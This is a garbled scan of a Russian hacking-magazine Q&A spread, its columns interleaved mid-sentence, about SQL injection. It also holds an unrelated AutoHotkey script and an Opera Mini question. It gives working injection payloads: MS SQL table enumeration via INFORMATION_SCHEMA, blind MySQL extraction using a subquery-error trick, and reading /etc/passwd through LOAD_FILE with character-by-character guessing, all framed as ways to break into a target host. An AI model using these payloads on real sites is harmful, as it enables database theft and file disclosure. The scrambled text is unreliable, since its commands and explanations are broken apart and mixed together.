3. Для определения таблиц в MS SQL делаю запрос «http://host/script. идет речь. Как ты понимаешь, использование benchmark'a довольно неудоб- цию можно посмотреть в блоге «первооткрывателя» метода – http://pragmatk. autohotkey (http://www.autohotkey.com/download) для настройки горячих кла-
cfm?Author_ID=9 or 1=(SELECT TOP 1 TABLE_NAME FROM NFORMATION_SCHEMA. но. Нагрузка на сервер (может вообще «положить» слабый сервер на неко- geeksgonewild.info/2009/01/to-the-limit-and-beyond.html. виш в системе. После установки нужно создать новый файл *.ahk, в котором бу-
TABLES WHERE TABLE_NAME NOT IN ('logins'))--», но вместо названия следую- торое время), длительное выполнение конечного эксплоита, подбор параме- дет располагаться текст нашего сценария:
щей таблицы получаю сообщение об ошибке в синтаксисе. тров для функции benchmark - все это зачастую отбивает желание надломать #installkeybdhook
4. Как провести blind sql-инъекцию в MS Access? таргет-хост. Но был найден альтернативный способ - провокация запроса. Как Q: По каким ключевым словам в тексте ASP-приложений стоит искать потенциальные #Persistent
5. Есть обычная инъекция, но при этом sixss не выполняется. Что может быть обычно, пример: XSS-уязвимости? #hotkeyinterval,100
не так? Сервер выдает «Warning: mysql_fetch_array(): supplied argument is not a Script.php?Vul=1 and 1=(SELECT 1 UNION SELECT 2) A: Если в PHP мы обращаем внимание на переменные, выводимые с помощью setkeydelay, -1
valid mysql result resource...». Конечно же, мы получим ошибку «mysql_query():Subquery returns more than 1 print/echo, то в ASP следует обратить внимание на участки кода с ключевыми ^+c::
6. Что за техника SQL-injection more1row? row» так как подзапрос возвращает две строки. Таким образом, мы можем ор- словами Response, «%=», Request. {
7. Исследовал один движок. в исходниках явно видна возможность инжектиро- ганизовать посимвольный перебор, как и при стандартной blind sql-injection, но Пример баги: img src='%=Request.querystring(«Param») %'. Send, ^c
вания sql-операторов, но в итоге, ничего не происходит, хотя баг есть 100%! в качестве одного из возможных значений возвращаемых функцией IF() сделать Sleep 50
8. Не могу понять, как через слепую инъекцию можно просматривать файлы на (SELECT 1 UNION SELECT 2). Q: Объясните ситуацию. На телефоне я уже давно использую Opera Mini для серфин- Run, http://www.google.com/search?Q=%clipboard%
сервере? 7. Видимо, PHP на твоем сервере не настроен на показ ошибок, либо включены га, но с такой проблемой (или даже правильнее сказать – багой) столкнулся в первый Return
9. я так и не понял, как с помощью PROCEDURE ANALYSE() получить названия магические кавычки. Проверь следующие параметры в php.ini: раз. Перейдя как-то на стартовую страницу Google, обнаружил, что система распо- }
таблиц и колонок. Можешь показать на практике? Magic_quotes=OFF # в GPC-запросах отключаем магические кавычки; знала меня как некоторого пользователя. Перейдя в Gmail, увидел, что я авторизиро- Все просто: этот сценарий использует переменную %clipboard%, в которой хра-
A: ОК, обо всем по порядку. error_reporting=E_ALL # показ ошибок; ван и там. Как это могло произойти? Неужели такая недоработка со стороны команды нится содержание буфера обмена, и передает его в Google URL как параметр
1. Скорее всего, есть фильтрация. Попробуй что-нибудь вроде union select ... mysql.trace_mode=ON # включен показ ошибок «мускула». Opera? в качестве устройства использовалась версия для Windows Mobile. для поиска. Как только скрипт создан, дважды кликни по нему - и в трее поя-
2. Разные кодировки, при этом в ошибке не указано название нужной нам. Если 8. Есть файл /etc/passwd, его начало: root:x:0:0:root:/root:/bin/bash A: Это достаточно известный баг, причем вовсе не разработчиков Opera. вится новая иконка (чтобы избавиться от нее, необходимо добавить директи-
доступны исходники этого скрипта (cms), то смотри, какая кодировка использу- bin:x:1:1:bin:/bin:/sbin/nologin Вспомни, как ты устанавливал Opera Mini? Скорее всего, не из оригинально- ву #notrayicon в самое начала скрипта). Выделяем в любом приложение нужное
ется в базе данных. Структура создаваемых при инсталляции таблиц находит- Первый символ 'r', его ascii-код - 114, смотрим: го jar-файла, а с помощью готовой сборки из .cab. Это все объясняет. Инстал- слово, жмем заветную комбинацию клавиш Ctrl+Shift+C и наблюдаем, как
ся в файле *.sql(install.sql, {cmsname}.sql и т.п.). к примеру, содержимое мо- Http://host/script.php?Vul=1' and ascii(substring((LOAD_FILE('/etc/ лировать .jar-файлы на WM не очень удобно, к тому же пользователи сталкива- в новом окне браузера открывается страничка Google'а с нужным нам запросом.
жет быть таким: passwd')),1,1))=111 - ничего не загружается; ются с тем, что установленный эмулятор Java часто оказывается старой версии.
18 19
